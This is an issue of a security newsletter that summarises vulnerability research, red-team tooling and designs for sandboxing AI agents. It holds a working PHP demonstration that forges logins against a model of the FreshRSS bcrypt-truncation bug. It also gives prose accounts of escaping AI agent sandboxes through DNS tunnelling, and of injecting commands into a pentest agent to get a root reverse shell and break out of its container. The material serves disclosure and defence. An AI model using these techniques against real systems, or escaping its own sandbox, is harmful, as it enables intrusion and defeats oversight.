[tl;dr sec] #321 - Sandboxing AI Agents, Trivy Compromised, Pentesting AWS' AI Pentester

Sandbox approaches by NVIDIA and Niels Provos, moar supply chain compromises, vulnerabilities in AWS Security Agent

Hey there,

I hope you’ve been doing well!

👨‍💼 I Will Survive

Phew, stay strong my friends, we’re almost through the BSidesSF and RSAC montage ✊ 

Too many to list them all, but some quick thoughts and moments that stuck out:

  • Thank you to everyone who came to the inaugural tl;dr sec community meet-up! I had a blast 🥰 Also shout-out to Scott Behrens and Travis McPeak for joining me for a fireside chat.

  • Anna Westelius gave an inspiring BSidesSF keynote about reasons for us security folks to be optimistic.

  • It was fun joining my friends Ken Johnson, Seth Law, Kevin McDermott, and Astha Singhal on an Absolute AppSec panel at BSidesSF.

  • Delicious KBBQ with a bunch of other security creator nerds, H/T Ashish and Shilpi of the Cloud Security Podcast for organizing!

  • Huge thanks to Decibel’s Dan Nguyen-Huu and Jon Sakoda for hosting an awesome set of lightning talks, which my bud Daniel Miessler also helped organize. Great talks from Rob Ragan, Jackie Bow, Andrew Becherer, and Sydney Marrone!

    • Dave Aitel choosing the Imperial March from Star Wars as his intro music was delightful 😂 

  • Randomly meeting former NSA Director Rob Joyce! H/T Lina Lau, whose company is working on some impactful stuff 👀 

  • Hearing from folks who were moved by my talk last BSidesSF about vulnerability 🥹 This had the biggest impact on me.

Security creator friends!

Sponsor

📣 AI is Expanding Your Attack Surface.
Can You Secure It?

AI adoption is accelerating across cloud environments, from LLMs to autonomous agents and complex data pipelines. But without dedicated AI security posture management (AI-SPM), these innovations introduce a new class of risks that traditional tools can’t address.

From exposed training data to overprivileged AI agents, the attack surface is expanding faster than security teams can keep up.

Download the guide to learn a five-step framework to gain visibility, assess risk and secure AI across your cloud environment.

👉 Download guide 👈

Having visibility into the AI usage in your environment is important, and unfortunately not always easy 😅 I hear from lots of security leaders working on securing AI usage these days.

AppSec

ChiChou/vscode-frida
A VSCode extension providing comprehensive IDE for Frida dynamic instrumentation, featuring a sidebar for listing apps/processes on local/USB/remote devices, interactive panels for browsing modules/exports and classes/methods (Java/Objective-C), and one-click hook generation for native functions, ObjC selectors, and Java methods.

How "Strengthening Crypto" Broke Authentication: FreshRSS and bcrypt's 72-Byte Limit
Pentester Lab's Louis Nyffenegger analyzes CVE-2025-68402, an authentication bypass in the development branch of FreshRSS, a self-hosted RSS aggregator, caused by a "strengthen crypto" commit that replaced SHA-1 (40 hex chars) with SHA-256 (64 hex chars) for nonce generation. The nonce is concatenated with the user's stored bcrypt hash before verification, and the longer nonce pushed the password-dependent portion of that input past bcrypt's 72-byte truncation limit: 64 nonce chars + the 7-char algorithm identifier ($2y$10$) + one salt character is exactly 72 bytes, so password_verify() compared only those bytes, none of which depend on the actual password. The remaining 21 salt chars and the 31-char hash, the only part that actually depends on the password, were never looked at.

"A commit meant to strengthen the crypto ended up removing the need for a valid password." 😱 
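To see the truncation concretely, here is an added PHP example (not FreshRSS's code and not from the Pentester Lab write-up) that models the vulnerable check in a toy function, shows that a challenge built from nothing but the nonce and the bcrypt prefix is accepted, and contrasts an assumed HMAC-based hardening. The function names, the sample password, and the fix are assumptions for the demo, not FreshRSS's actual patch.

```php
<?php
declare(strict_types=1);

// Toy model of the vulnerable pattern: the client sends bcrypt($nonce . $storedHash)
// and the server re-checks it with password_verify(). Names are demo assumptions.
function verifyChallengeVulnerable(string $nonce, string $storedHash, string $challenge): bool
{
    // bcrypt silently ignores everything after byte 72 of its input.
    return password_verify($nonce . $storedHash, $challenge);
}

// One possible hardening (an assumption, not necessarily what FreshRSS shipped):
// bind the nonce to the stored hash with an HMAC, which has no input length limit,
// and compare in constant time. The client would send this HMAC as its proof instead.
function verifyChallengeFixed(string $nonce, string $storedHash, string $challenge): bool
{
    $expected = hash_hmac('sha256', $nonce, $storedHash);
    return hash_equals($expected, $challenge);
}

// bcrypt's own base64 alphabet, used for the 22 salt characters of a "$2y$" hash.
const BCRYPT_ALPHABET = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

// Server state: stored hash for the real password ("$2y$10$" + 22 salt + 31 hash = 60 chars)
// and a SHA-256 nonce (64 hex chars), as after the "strengthen crypto" commit.
$storedHash = password_hash('correct horse battery staple', PASSWORD_BCRYPT, ['cost' => 10]);
$nonce      = hash('sha256', random_bytes(32));
if (strlen($storedHash) !== 60 || strlen($nonce) !== 64) {
    throw new RuntimeException('unexpected hash/nonce length');
}

// 1. A challenge computed over the full nonce . storedHash input (what an honest
//    login produces) is accepted.
$legit = password_hash($nonce . $storedHash, PASSWORD_BCRYPT, ['cost' => 10]);
printf("honest challenge accepted: %s\n",
    var_export(verifyChallengeVulnerable($nonce, $storedHash, $legit), true));

// 2. An attacker who knows only the nonce. The 72 compared bytes are
//    nonce (64) + "$2y$10$" (7, the guessable default) + first salt char (1).
//    That char has 64 possibilities, so at most 64 bcrypt computations (one login
//    attempt each, in a real attack) yield an accepted challenge with no knowledge
//    of the password or of the stored hash.
$forged = null;
foreach (str_split(BCRYPT_ALPHABET) as $guess) {
    $candidate = password_hash($nonce . '$2y$10$' . $guess, PASSWORD_BCRYPT, ['cost' => 10]);
    if (verifyChallengeVulnerable($nonce, $storedHash, $candidate)) {
        $forged = $candidate;
        printf("forged challenge accepted after guessing salt char '%s'\n", $guess);
        break;
    }
}
if ($forged === null) {
    throw new RuntimeException('forgery failed; is the stored hash using cost 10?');
}

// 3. The same forgery against the HMAC-based check is rejected, while a client that
//    really holds the stored hash still passes.
printf("forgery vs fixed check: %s\n",
    var_export(verifyChallengeFixed($nonce, $storedHash, $forged), true));
printf("honest vs fixed check:  %s\n",
    var_export(verifyChallengeFixed($nonce, $storedHash, hash_hmac('sha256', $nonce, $storedHash)), true));
```

The general lesson is not "don't use SHA-256": it is that bcrypt is a password hash, not a MAC, and any construction that feeds a nonce plus other material into it needs either a pre-hash (so the input is always short and every byte of it matters) or a real keyed MAC. A cheap guard that would have caught this change in review is asserting that whatever reaches password_hash()/password_verify() is at most 72 bytes.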

Sponsor

📊 Cside Report: The Future of Web Security Depends on the Browser

The browser runtime sits between your website < > customers, bots, AI agents, and fraudsters. No one is watching it. And agents now access websites on behalf of humans, adding the risk of consumer agents being manipulated by script injections from third-party code. Grab this report to see data on: the new threat of locally hosted stealth browsers, a 15x rise in user-action AI agents, 275% increase on discussions of bot traffic, and results of an industry survey on how practitioners are preparing against AI-agent driven website fraud.

I could definitely see the bar rising for preventing AI-agent driven fraud or bot abuse given improvements in AI + browser use. I’m curious how we secure this new world.

Cloud Security

IAMTrail
AWS silently updates Managed IAM policies all the time. This project by Victor Grenu tracks the full version history and diffs for 1525 AWS Managed IAM Policies, archived since 2019.

Pwning AI Code Interpreters in AWS Bedrock AgentCore
Friend of the newsletter Kinnaird McQuade (BeyondTrust) discovered that the AWS Bedrock AgentCore Code Interpreter’s Sandbox network mode (“complete isolation with no external access”) does allow public DNS queries. The post walks through using that capability to establish bidirectional command and control (C2) over a custom tunneling protocol carried in DNS queries and responses, obtain a full interactive reverse shell, exfiltrate data, and execute commands with the Code Interpreter’s IAM role. GitHub PoC.

Result: "AWS communicated that a fix will not be made and it will change the documentation’s description of sandbox mode instead. AWS awarded the security researcher with a $100 gift card to the AWS Gear Shop." 😂

Inside AWS Security Agent: A multi-agent architecture for automated penetration testing
AWS’ Tamer Alkhouli, Divya Bhargavi, Daniele Bonadiman, et al. describe how AWS Security Agent works and how they benchmarked it. With CTF instructions and grader checks after each tool call it achieved 92.5% on CVE Bench v2.0; 80% without CTF instructions or grader feedback (closer to real-world conditions); and 65% using an LLM whose knowledge cutoff predates the CVE Bench v1.0 release.

See also Sena Yakut’s blog overview on setting up AWS Security Agent and scanning DVWA.

💡 This post actually had a pretty good amount of details and context, nice. I also found it interesting how performance dropped when using an LLM with knowledge cutoff before the CVE Bench release: is it doing better due to “memorizing” the answers, or is it just a worse model because it’s older? 🤔 

Pentesting a pentest agent - Here's what I've found in AWS Security Agent
Richard Fan discovered five security vulnerabilities in AWS Security Agent, an autonomous AI pentesting tool, and discusses four of them (the 5th isn’t fixed yet).

  1. A DNS confusion bug allowed an attacker to use Route53 private hosted zones to trick the agent into pentesting public domains they don't own, by exploiting the "Unreachable" domain status and the timing of DNS record verification.

  2. Richard was able to trick the agent into hacking itself: by injecting commands into debug messages he obtained a reverse shell with root access to the agent sandbox, then escaped the container through the mounted /run/docker.sock to reach the host EC2 instance and its IAM role credentials.

  3. He found the agent sometimes performs unnecessarily destructive actions like using DROP TABLE for SQL injection probes.

  4. The agent can expose unredacted passwords in pentest reports.

Supply Chain

Agent Skills are the New Packages of AI: It's Time to Manage Them Securely
JFrog’s Yonatan Arbel announces their Agent Skills Registry product. Yonatan argues that we should be treating Skills like open source dependencies: version tracking them, scanning them for malicious contents, tracking provenance, etc.

💡Something like this makes a lot of sense to me. We should be taking all of the lessons we’ve learned over time from various package registries and language ecosystems and ideally building them in from the beginning with new things like Skills.

Blue Team

mandiant/speakeasy
By Mandiant: A Windows malware emulation framework that executes binaries, drivers, and shellcode in a modeled Windows runtime instead of a full VM. It emulates APIs, process/thread behavior, filesystem, registry, and network activity so samples can keep moving through realistic execution paths.

FancyBear Exposed: Major OPSEC Blunder Inside Russian Espionage Ops
Ctrl-Alt-Intel discovered an exposed open-directory on a FancyBear (APT28/GRU) C2 server that revealed the group's complete toolkit, telemetry logs, and exfiltrated data from a 500+ day espionage campaign targeting government and military entities across Ukraine, Romania, Bulgaria, Greece, Serbia, and North Macedonia. The exposed server contained 2,800+ exfiltrated emails, 240+ credential sets with TOTP 2FA secrets, and more.

“FancyBear developed a modular, multi-platform exploitation toolkit where a victim simply opening a malicious email - with no further clicks - could result in their credentials stolen, their 2FA bypassed, emails within their mailbox exfiltrated, and a silent forwarding rule established that persists indefinitely.”

Red Team

Islands of Invariance
Rasta Mouse (Daniel Duggan) describes how Crystal Palace now includes an automatic YARA generator that creates signatures based on "islands of invariance" (predictable code patterns that survive optimization unchanged).

A scalpel, a hammer, and a foot gun
Raphael Mudge has released ised, a program rewriting tool for Crystal Palace that surgically inserts or replaces code at instruction pattern matches to break content signatures. The tool uses a two-pass implementation with prepend/append/replace buckets and supports specific/generic/mnemonic pattern matching from Crystal Palace's disassembler output.

"A potential outcome is that researchers building tools on this platform may feel quite comfortable releasing Yara rules for all of their capability. It’s no loss, because they and their users would likely have a private ised-cocktail ready to go. What would change in red teaming (or cybersecurity even), if there was no fear of ‘burning a tool’ because of its content tells and behavior was the only meaningful battleground?"

ghostvectoracademy/DLLHijackHunter
By GhostVector Academy: An automated Windows DLL hijacking detection tool that discovers, validates, and confirms exploitable DLL hijack opportunities through a four-phase pipeline: discovery (enumerates binaries across services, scheduled tasks, startup items, COM objects, and AutoElevate UAC bypass vectors), filtration (eliminates false positives through hard and soft gates), canary confirmation (deploys a harmless canary DLL and triggers the binary to prove the hijack works), and scoring (0-100% confidence plus 0-10 impact score based on privilege gained, trigger reliability, and stealth).

AI + Security

NVIDIA/NemoClaw
An open source reference stack that simplifies running OpenClaw agents inside NVIDIA OpenShell sandboxes with multi-layer security controls including Landlock, seccomp, network namespaces, and policy-enforced egress filtering. More below.

NVIDIA/OpenShell
OpenShell provides a sandboxed execution environment for AI agents that enforces declarative YAML policies to prevent unauthorized file access, data exfiltration, and uncontrolled network activity. The system runs as a K3s cluster inside a single Docker container and applies defense-in-depth across four policy domains: filesystem (read/write restrictions), network (outbound connection control with HTTP method and path-level enforcement), process (privilege escalation blocking), and inference (model API call routing).

OpenShell supports Claude, OpenCode, Codex, OpenClaw, and Ollama agents out of the box and manages credentials as injectable providers that never touch the sandbox filesystem. Security policies are hot-reloadable at runtime for the network and inference layers, while filesystem and process restrictions are locked at sandbox creation.

IronCurtain: A Personal AI Assistant Built Secure from the Ground Up
Security legend Niels Provos asked himself: How would you build a personal AI assistant if you took security seriously from the start? So he built IronCurtain, which sandboxes LLM-generated code, enforces policy in plain English, and keeps credentials out of the agent's reach.

IronCurtain funnels all actions through a single MCP proxy chokepoint where a policy engine enforces rules written in plain English and compiled to deterministic policies. The system supports two sandbox modes: Code Mode runs LLM-generated TypeScript in isolated V8 with no filesystem/network access, while Docker Mode runs full agents like Claude Code CLI in containers with --network=none where a MITM proxy swaps fake API keys for real ones to maintain credential separation.

The plain-English constitution approach (inspired by Microsoft Research's LEGALEASE) lets users write policies like "agent may read/write files in project directory but must ask before git push" which compile to deterministic allow/deny/escalate rules, with an optional auto-approver that recognizes explicit user intent to reduce alert fatigue.

💡 Really thoughtful, great read. I love the architecture of making sure there’s a single security enforcement point, and how you can ease the burden of writing complex enforcement policies via natural language (but that are still enforced deterministically).

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint

P.S. Feel free to connect with me on LinkedIn 👋